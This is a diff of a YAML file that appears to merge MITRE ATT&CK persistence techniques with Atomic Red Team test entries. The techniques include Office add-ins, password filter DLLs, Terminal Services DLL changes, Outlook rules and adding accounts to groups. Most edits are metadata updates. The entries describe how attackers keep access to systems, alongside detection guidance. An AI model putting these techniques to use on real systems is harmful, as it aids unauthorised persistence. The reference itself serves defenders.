-      - source_name: FireEye Mail CDS 2018
-        url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
-        description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
-          Enterprise Email Compromise. Retrieved April 22, 2019.
-      - source_name: GlobalDotName Jun 2019
-        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
-        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
-          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:37:09.190Z'
       name: 'Office Application Startup: Add-ins'
       description: "Adversaries may abuse Microsoft Office add-ins to obtain persistence
         on a compromised system. Office add-ins can be used to add functionality to
@@ -32208,13 +32554,18 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Modification'
@@ -32222,11 +32573,34 @@ persistence:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
+      created: '2019-11-07T19:52:52.801Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/006
+        external_id: T1137.006
+      - source_name: FireEye Mail CDS 2018
+        description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
+          Enterprise Email Compromise. Retrieved April 22, 2019.
+        url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
+      - source_name: MRWLabs Office Persistence Add-ins
+        description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
+          Persistence. Retrieved July 3, 2017.
+        url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
+      - source_name: Microsoft Office Add-ins
+        description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
+        url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
+      - source_name: GlobalDotName Jun 2019
+        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.006
     atomic_tests: []
   T1505.002:
@@ -32257,7 +32631,7 @@ persistence:
         url: https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf
         description: 'Faou, M. (2019, May). Turla LightNeuron: One email away from
           remote code execution. Retrieved June 24, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T17:05:44.321Z'
       name: 'Server Software Component: Transport Agent'
       description: "Adversaries may abuse Microsoft transport agents to establish
         persistent access to systems. Microsoft Exchange transport agents can operate
@@ -32295,13 +32669,11 @@ persistence:
       - SYSTEM
       - Administrator
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1505.002
     atomic_tests: []
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -32327,7 +32699,7 @@ persistence:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -32369,7 +32741,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1098.006:
     technique:
@@ -32447,11 +32818,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -32531,35 +32901,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -32583,71 +32928,60 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests: []
   T1505.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
-      created: '2022-03-28T15:34:44.590Z'
-      x_mitre_version: '1.0'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1505.005
-        url: https://attack.mitre.org/techniques/T1505/005
-      - source_name: James TermServ DLL
-        url: https://twitter.com/james_inthe_box/status/1150495335812177920
-        description: James. (2019, July 14). @James_inthe_box. Retrieved March 28,
-          2022.
-      - source_name: Microsoft System Services Fundamentals
-        url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
-        description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
-          Retrieved March 28, 2022.
-      - source_name: Microsoft Remote Desktop Services
-        url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
-        description: Microsoft. (2019, August 23). About Remote Desktop Services.
-          Retrieved March 28, 2022.
-      - source_name: RDPWrap Github
-        url: https://github.com/stascorp/rdpwrap
-        description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
-          Retrieved March 28, 2022.
-      - source_name: Windows OS Hub RDP
-        url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
-        description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
-          Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-12T19:40:42.810Z'
+      name: 'Server Software Component: Terminal Services DLL'
       description: |-
         Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)
 
         [Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: <code>svchost.exe</code>) load the service's DLL file, the location of which is stored in a Registry entry named <code>ServiceDll</code>.(Citation: Microsoft System Services Fundamentals) The <code>termsrv.dll</code> file, typically stored in `%SystemRoot%\System32\`, is the default <code>ServiceDll</code> value for Terminal Services in `HKLM\System\CurrentControlSet\services\TermService\Parameters\`.
 
         Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal <code>termsrv.dll</code> functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the <code>termsrv.dll</code> file or modifying the <code>ServiceDll</code> value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Server Software Component: Terminal Services DLL'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for changes to Registry keys associated with <code>ServiceDll</code> and other subkey values under <code>HKLM\System\CurrentControlSet\services\TermService\Parameters\</code>.
 
@@ -32656,24 +32990,56 @@ persistence:
         Monitor commands as well as  processes and arguments for potential adversary actions to modify Registry values (ex: <code>reg.exe</code>) or modify/replace the legitimate <code>termsrv.dll</code>.
 
         Monitor module loads by the Terminal Services process (ex: <code>svchost.exe -k termsvcs</code>) for unexpected DLLs (the default is <code>%SystemRoot%\System32\termsrv.dll</code>, though an adversary could also use [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) on a malicious payload).
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.0'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Command: Command Execution'
       - 'File: File Modification'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Process: Process Creation'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
+      created: '2022-03-28T15:34:44.590Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1505/005
+        external_id: T1505.005
+      - source_name: James TermServ DLL
+        description: James. (2019, July 14). @James_inthe_box. Retrieved September
+          12, 2024.
+        url: https://x.com/james_inthe_box/status/1150495335812177920
+      - source_name: Microsoft System Services Fundamentals
+        description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
+          Retrieved March 28, 2022.
+        url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
+      - source_name: Microsoft Remote Desktop Services
+        description: Microsoft. (2019, August 23). About Remote Desktop Services.
+          Retrieved March 28, 2022.
+        url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
+      - source_name: RDPWrap Github
+        description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
+          Retrieved March 28, 2022.
+        url: https://github.com/stascorp/rdpwrap
+      - source_name: Windows OS Hub RDP
+        description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
+          Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
+        url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1505.005
     atomic_tests: []
   T1176:
     technique:
-      modified: '2024-04-18T23:22:37.874Z'
+      modified: '2024-09-12T19:48:15.871Z'
       name: Browser Extensions
       description: "Adversaries may abuse Internet browser extensions to establish
         persistent access to victim systems. Browser extensions or plugins are small
@@ -32765,8 +33131,8 @@ persistence:
         url: https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf
       - source_name: Chrome Extension C2 Malware
         description: 'Kjaer, M. (2016, July 18). Malware in the browser: how you might
-          get hacked by a Chrome extension. Retrieved November 22, 2017.'
-        url: https://kjaer.io/extension-malware/
+          get hacked by a Chrome extension. Retrieved September 12, 2024.'
+        url: https://web.archive.org/web/20240608001937/https://kjaer.io/extension-malware/
       - source_name: Catch All Chrome Extension
         description: Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension
           Steals All Posted Data. Retrieved November 16, 2017.
@@ -32797,7 +33163,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1176
     atomic_tests:
     - name: Chrome/Chromium (Developer Mode)
@@ -32869,66 +33234,135 @@ persistence:
         name: manual
   T1137.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:02:26.206Z'
+      name: Outlook Rules
+      description: |-
+        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
+
+        Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
       x_mitre_contributors:
       - Microsoft Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+
+        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Application Log: Application Log Content'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
       created: '2019-11-07T20:00:25.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1137.005
         url: https://attack.mitre.org/techniques/T1137/005
-      - source_name: SilentBreak Outlook Rules
-        url: https://silentbreaksecurity.com/malicious-outlook-rules/
-        description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
-          February 4, 2019.
+        external_id: T1137.005
+      - source_name: Pfammatter - Hidden Inbox Rules
+        description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
+          Microsoft Exchange. Retrieved October 12, 2021.
+        url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
       - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
         description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
           Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
           4, 2019.
-      - source_name: Pfammatter - Hidden Inbox Rules
-        url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
-        description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
-          Microsoft Exchange. Retrieved October 12, 2021.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SilentBreak Outlook Rules
+        description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
+          February 4, 2019.
+        url: https://silentbreaksecurity.com/malicious-outlook-rules/
       - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
         description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
           provides blue teams with the ability to detect Ruler usage against Exchange.
           Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Outlook Rules
-      description: |-
-        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
-
-        Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+        url: https://github.com/sensepost/notruler
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1098.007:
+    technique:
+      modified: '2024-10-14T14:32:08.926Z'
+      name: Additional Local or Domain Groups
+      description: "An adversary may add additional local or domain groups to an adversary-controlled
+        account to maintain persistent access to a system or domain.\n\nOn Windows,
+        accounts may use the `net localgroup` and `net group` commands to add existing
+        users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+        Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+        the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+        added to the local administrators group on Windows devices to maintain elevated
+        privileges. They may also be added to the Remote Desktop Users group, which
+        allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+        to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+        Linux, accounts may be added to the sudoers group, allowing them to persistently
+        leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+        for elevated privileges. \n\nIn Windows environments, machine accounts may
+        also be added to domain groups. This allows the local SYSTEM account to gain
+        privileges on the domain.(Citation: RootDSE AD Detection 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_detection: |-
-        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-
-        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
       x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Application Log: Application Log Content'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      - 'User Account: User Account Modification'
+      type: attack-pattern
+      id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+      created: '2024-08-05T20:49:49.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1098/007
+        external_id: T1098.007
+      - source_name: Linux Usermod
+        description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+        url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+      - source_name: Microsoft Net Group
+        description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+          2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+      - source_name: Microsoft Net Localgroup
+        description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+          5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+      - source_name: Microsoft RDP Logons
+        description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+          Services. Retrieved August 5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+      - source_name: RootDSE AD Detection 2022
+        description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+          Active Directory environments. Retrieved August 5, 2024.
+        url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1546.011:
     technique:
@@ -32959,7 +33393,7 @@ persistence:
         description: Pierce, Sean. (2015, November). Defending Against Malicious Application
           Compatibility Shims. Retrieved June 22, 2017.
         source_name: Black Hat 2015 App Shim
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.094Z'
       name: 'Event Triggered Execution: Application Shimming'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by application shims. The Microsoft
@@ -33014,13 +33448,11 @@ persistence:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.011
     atomic_tests: []
   T1547.010:
     technique:
-      modified: '2024-04-12T02:49:39.980Z'
+      modified: '2024-09-12T15:26:17.886Z'
       name: 'Boot or Logon Autostart Execution: Port Monitors'
       description: "Adversaries may use port monitors to run an adversary supplied
         DLL during system boot for persistence or privilege escalation. A port monitor
@@ -33081,9 +33513,9 @@ persistence:
           slides&#93;. Retrieved November 12, 2014.
         url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
       - source_name: AddMonitor
-        description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
-          2014.
-        url: http://msdn.microsoft.com/en-us/library/dd183341
+        description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -33092,7 +33524,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.010
     atomic_tests: []
   T1037.002:
@@ -33145,7 +33576,7 @@ persistence:
         Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
         version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
         and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:42:05.094Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
       x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -33166,7 +33597,6 @@ persistence:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.002
     atomic_tests:
     - name: Logon Scripts - Mac
@@ -33187,7 +33617,7 @@ persistence:
         name: manual
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
